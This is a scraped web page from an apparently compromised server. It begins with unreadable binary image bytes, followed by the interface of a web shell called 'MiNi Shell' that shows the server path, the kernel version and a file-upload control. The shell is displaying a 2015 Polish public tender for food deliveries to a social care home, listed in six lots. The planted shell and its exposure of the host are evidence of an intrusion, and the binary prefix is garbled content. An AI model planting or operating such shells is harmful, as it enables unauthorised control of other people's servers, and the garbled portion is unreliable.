JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150611/85095-N-2015.html

<p class="kh_header"><b>Nowa Wieś Ełcka: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 85095 - 2015; data zamieszczenia: 11.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Nowej Wsi Ełckiej , ul. Lipowa 1, 19-321 Nowa Wieś Ełcka, woj. warmińsko-mazurskie, tel. 087 6197770, 6197779, faks 087 6197490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsnwe.fantex.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Dom Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi dostawa artykułów spożywczych dla potrzeb Domu Pomocy Społecznej. Przedmiot zamówienia podzielony został odpowiednio na 6 części, zgodnie z załącznikiem nr 1: (część 1 dostawa pieczywa), (część 2 dostawa mleka i jego przetworów), (część 3 dostawa produktów spożywczych), (część 4 dostawa ryb, przetworów rybnych i mrożonek), (część 5 dostawa mięsa i wędlin), (część 6 dostawa warzyw i owoców )..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.61.25.00-6, 15.50.00.00-3, 15.80.00.00-6, 15.20.00.00-0, 15.10.00.00-9, 03.20.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wypełnione i podpisane oświadczenie zgodnie z art. 22 ust.1 i art. 24 ust. 1 i 2 ustawy PZP według załącznika Nr 2 do specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w jej przedmiocie lub terminie wykonania w następujących przypadkach: 
a) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego;
b) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
c) z powodu zmiany uwarunkowań prawnych i formalnych m.in. związanych ze zmianą podatku VAT
d) Zmiany wykonania umowy na skutek okoliczności, niezależnych i obiektywnych, których Zamawiający nie mógł przewidzieć w dacie sporządzenia SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsnwe.fantex.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Nowej Wsi Ełckiej ul. Lipowa 1 19-300 Ełk..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2015 godzina 09:00, miejsce: Dom Pomocy Społecznej w Nowej Wsi Ełckiej ul. Lipowa 1 19-300 Ełk..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Chleb zwykły krojony
15000
kg
2
Chleb razowy zwykły, ze słonecznikiem, soją, ziarnami (450g) krojony
4000
szt
3
Bułka wrocławska (50g)
60000
szt
4
Bułki słodkie z marmoladą, budyniem, makiem, jagodami, jabłkiem, serem (100g)
20000
szt
5
Pączki (50g)
7500
szt
6
Bułka drożdżowa
600
kg
7
Bułka tarta (500g)
300
szt
8
Ciasto rolada z kremem
300
kg
9
Makowiec extra
60
kg
10
Ciasto ptasie mleczko
200
kg
12
Ciasto metrowiec
140
kg
13
Babka piaskowa w polewie czekoladowej
150
kg
14
Babka lukrowana lub z cukrem pudrem
150
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mleka i jego przetworów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Mix tłuszczowy do smarowania o zawartości tłuszczu 68% w tym tłuszcz mleczny 50% i olej rzepakowy 18%
7800
szt
2
Mleko 3,2% (UHT)
18000
l
3
Śmietana 18% (400g)
3900
szt
4
Ser żółty gouda, podlaski, edamski
1000
kg
5
Serek topiony (100g) z pieczarkami, szynką, ziołami, szczypiorkiem
6000
szt
6
Twaróg półtłusty 
1150
kg
7
Serek homogenizowany (100g)
7000
szt
8
Serek twarogowy do smarowania typu sourage (100g)
1100
szt
9
Jogurt owocowy (150g)
18000
szt
10
Jogurt naturalny typu greckiego       (400 ml)
350
szt
11
Jogurt naturalny ( 180g)
800
szt
12
Maślanka naturalna (1l)
500
szt
13
Kefir naturalny (180g)
3000
szt
14
Margaryna  z masłem (500g)
4500
szt
15
Margaryna w kostce do pieczenia, smażenia  (250g)
900
szt
16
Drożdże (100g)
20
szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa produktów spożywczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Ryż
500
kg
2
Ryż paraboilet w saszetkach
200
szt
3
Mąka pszenna poznańska typ 500
900
kg
4
Mąka pszenna wrocławska typ 500
300
kg
5
Mąka ziemniaczana
180
kg
6
Kasza manna
200
kg
7
Kasza jęczmienna średnia
400
kg
8
Kasza jęczmienna mazurska w saszetkach  (1kartonik 4 razy po 100g)
24
szt
9
Kasza gryczana prażona w saszetkach  (1kartonik 4 razy po 100g)
24
szt
10
Kleik ryżowy błyskawiczny (170g)
60
szt
11
Kaszka mleczno-ryżowa  owocowa (230g)
400
szt
12
Kaszka ryżowa bezmleczna owocowa (180g)
200
szt
13
Płatki owsiane zwykłe (0,5kg)
300
kg
14
Budyń (40g)
500
szt
15
Kisiel (40g)
600
szt
16
Makaron z mąki durum nitki (500g)
400
kg
17
Makaron z mąki durum świderki, muszelki (500g)
1100
kg
18
Herbata liściasta  czarna  (100g)
900
szt
19
Herbata liściasta earl grey (100g)
900 
szt
20
Kawa zbożowa inka klasyczna mająca w składzie jęczmień, żyto, cykorię i buraki cukrowe (150g)
700
szt
21
Kakao (100g)
200
szt
22
Ocet spirytusowy 10% (0,5l)
180
szt
23
Musztarda (0,9l) kremska, chrzanowa, sarepska
500
szt
24
Ketchup mający w zawartości przynajmniej 160g pomidora w 100g ketchupu, łagodny i pikantny ( 500g)
700
szt
25
Majonez  napoleoński (0,9l) 
500
szt
26
Olej z pierwszego tłoczenia, filtrowany na zimno (1 l)
50
szt
27
Szczaw krojony (240g)
600
szt
28
Ogórek konserwowy (0,9 l)
700
szt
29
Sałatka wielowarzywna marynowana mająca w składzie ogórek cebulę, paprykę i marchew(0,9l)
300
szt
30
Sok owocowy naturalny 100% bez cukru jabłkowy i pomarańczowy (1l)
3600
szt
31
Soczek owocowy przecierowy marchew, jabłko + dowolny smak owocu, mający w składzie przynajmniej 47% koncentratu owocowego. 
21 000
szt
32
Syrop owocowy o zawartości ekstraktu ogólnego co najmniej 65% (440 mal)
1500
szt
33
Dżem wysokosłodzony: truskawkowy, wiśniowy, czarna porzeczka (280g)
1500
szt
34
Dżem niskosłodzony brzoskwinia, wiśnia, truskawka (280g)
900 
szt
35
Marmolada wieloowocowa twarda (1 kg)
350
szt
36
Płatki śniadaniowe z miodem, czekoladowe (500g)
100
szt
37
Chrzan śmietankowy (320g)
500
szt
38
Ćwikła z chrzanem (320g)
500
szt
39
Groszek konserwowy (400g)
100
szt
40
Czosnek granulowany
200
szt
41
Curry (20g)
240
szt
42
Galaretka owocowa (79g)
100
szt
43
Herbatniki  petit-beaure (55g)
1800
szt
44
Liść laurowy (5g)
400
szt
45
Majeranek (6g)
500
szt
46
Papryka w proszku (16g)
250
szt
47
Pieprz ziołowy (20g)
700
szt
48
Pieprz naturalny (15g)
700
szt
49
Przyprawa w płynie (1l) typu magi
220
szt
50
Sos spaghetti  (0,9l)
300
szt
51
Ziele angielskie (12g)
1400
szt
52
Cukier
3000
kg
53
Przyprawa typu jarzynka (500g)
220
kg
54
Cynamon
240
szt
55
Imbir
50
szt
56
Gałka muszkatołowa mielona
50
szt
57
Cukier  waniliowy
300
szt
58
Miód naturalny wielokwiatowy (słoik 1,3 kg; 1 kg;   0,38 kg)
200
kg
59
Sól kamienna (1000g)
400
kg
60
Wafelki (100g)
900
szt
61
Pieczywo chrupkie bezglutenowe 
220
szt
62
Mąka kukurydziana 
40
kg
63
Czekolada mleczna (100g)
1100
szt
64
Czekolada bez cukru dla diabetyków (100g)
175
szt
65
Kukurydza konserwowa  (400g)
100
szt
66
Makaron bezglutenowy (500g)
30
szt
67
Kasza jaglana (500g)
20
szt
68
Paszteciki sojowe z papryką, pieczarkami, pomidorami, koperkiem (105g)
100
szt
69
Koncentrat pomidorowy 30% bez konserwantów 
50
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa ryb, przetworów rybnych i mrożonek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.
Filety z miruny SHP (kawałki w tafli 230-280g)
600
kg
2.
Kostka (filet) rybna w panierce
50
kg
3.
Paluszki (filet) rybne
400
kg
4.
Śledź marynowany płaty
60
kg
5.
Śledź po wiejsku marynowany
60
kg
6.
Matias filety śledziowe w oleju
60
kg
7.
Śledź solony płaty
60
kg
8.
Paprykarz szczeciński (300g)
400
szt
9.
Śledź w oleju (300g)
100
szt
10.
Szprot w oleju (300g)
100
szt
11.
Szprot w pomidorach (300g)
100
szt
12.
Makrela w oleju (300g)
100
szt
13.
Makrela w pomidorach (300 g)
100
szt
14.
Sałatka rybna (300g)
400
szt
15.
Makrela wędzona 
500
kg
16.
Marchew mrożona kostka
600
kg
17.
Mieszanka kompotowa 4-składnikowa (śliwka z pestką, wiśnia z pestka, truskawka, porzeczka czerwona)
950
kg
18.
Mieszanka kompotowa 7-składnikowa (śliwka z pestką, wiśnia z pestka, rabarbar, truskawka, porzeczka czerwona, porzeczka czarna)
950
kg
19.
Mieszanka warzywna
400
kg
20.
Truskawka mrożona
120
kg
21.
Pyzy z mięsem
240
kg
22.
Pierogi z truskawkami
120
kg
23.
Ruskie pierogi
60
kg
24.
Pierogi z mięsem
120
kg
25.
Pierogi z kapustą i grzybami
60
kg
26.
Uszka z grzybami
60
kg
27.
Kopytka
180
kg
28.
Kalafior
200
kg
29.
Brukselka
240
kg
30.
Brokuły
240
kg
31.
Fasolka szparagowa
380
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa mięsa i wędlin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Szynka wp b/k
200
kg
2
Boczek wędzony parzony
120
kg
3
Żeberka mostki mięsne
120
kg
4
Flak wołowy krojony
65
kg
5
Ozory wp
100
kg
6
Boczek surowy b/ż
250
kg
7
Golonka wp surowa z/k
20
kg
8
Karczek wp b/k
200
kg
9
Łopatka wp b/k
600
kg
10
Nogi wp surowe
65
kg
11
Podgardle surowe bez skóry
60
kg
12
Serca wp 
50
kg
13
Schab wp b/k
200
kg
14
Słonina surowa bez skóry 
100
kg
15
Filet z kurczaka
180
kg
16
Udka z kurczaka
800
kg
17
Porcje rosołowe
1200
kg
18
Pachwina wp surowa
25
kg
19
Żołądki drobiowe
150
kg
20
Kurczak świeży
270
kg
21
Golonka prasowana-wędlina
100
kg
22
Wieprzowa II
130
kg
23
Konserwa wieprzowa, blokowa-sterylizowana o zawartości mięsa wieprzowego 85% (300g)
400
szt
24
Przysmak szynkowy
140
kg
25
Rolada drobiowa
150
kg
26
Kiełbasa parówkowa
250
kg
27
Parówki paluszki typu hot-dog
300
kg
28
Mortadela parzona
100
kg
29
Kiełbasa toruńska 
300
kg
30
Kiełbasa śląska
250
kg
31
Kiełbasa biała surowa extra
270
kg
32
Szynka wieprzowa wędzona
150
kg
33
Szynka drobiowa-wędlina
150
kg
34
Mielonka wieprzowa -wędlina
60
kg
35
Polędwica sopocka
150
kg
36
Polędwica drobiowa
100
kg
37
Baleron
80
kg
38
Kiełbasa żywiecka 
120
kg
39
Pieczeń wp
100
kg
40
Pasztet na wagę
200
kg
41
Kaszanka
180
kg
42
Pasztetowa w osłonce foliowej
80
kg
43
Pasztetowa we flaku  
120
kg
44
Kiełbasa szynkowa
100
kg
45
Wątróbka drobiowa
150
kg
46
Łopatka wołowa b/k 
100
kg
47
Pasztet (300g)
1000
szt
48
Salami
120
kg
49
Salceson we flaku
100
kg
50
Kiełbasa palcówka 
60
kg
51
Filet z indyka wędzony
100
kg
52
Szynka wieprzowa wędzona typu swojskiego, wysokogatunkowa
45
kg
53
Schab wędzony, wysokogatunkowy
100
kg
54
Kiełbasa krakowska sucha
100
kg
55
Boczek wędzony typu swojskiego, wysokogatunkowy
30
kg
56
Podudzie z kurczaka wędzone
200
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa warzyw i owoców..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Groch
100
kg
2
Ziemniak młody
15500
kg
3
Fasola
200
kg
4
Szczypior
700
szt
5
Por
100
kg
6
Marchew
1500
kg
7
Seler
90
kg
8
Pietruszka
90
kg
9
Buraki
650
kg
10
Botwina
160
pęczek
11
Ogórek świeży
2100
kg
12
Cebula młoda
700
kg
13
Brokuł
400
szt
14
Kalafior
400
szt
15
Pomidory
2400
kg
16
Kapusta pekińska
120
kg
17
Kapusta włoska
60
szt
18
Kapusta kiszona
300
kg
19
Kapusta czerwona
30
kg
20
Kapusta młoda
500
szt
21
Ogórek małosolny
900
kg
22
Ogórek kiszony
110
kg
23
Pieczarki
150
kg
24
Koper
1000
szt
25
Natka pietruszki
800
szt
26
Banany
700
kg
27
Jabłka
1500
kg
28
Jaja
1200
kg
29
Rzodkiewka 
400
pęczek
30
Pomarańcze
200
kg
31
Śliwki fioletowe
350
kg
32
Biała rzodkiew
60
kg
33
Papryka świeża czerwona 
40
kg
34
Wiśnie
200
kg
35
Cukinia
60
kg
36
Sałata masłowa
600
szt
37
Cytryny
150
kg
38
Brzoskwinie
400
kg
39
Nektarynki
400
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com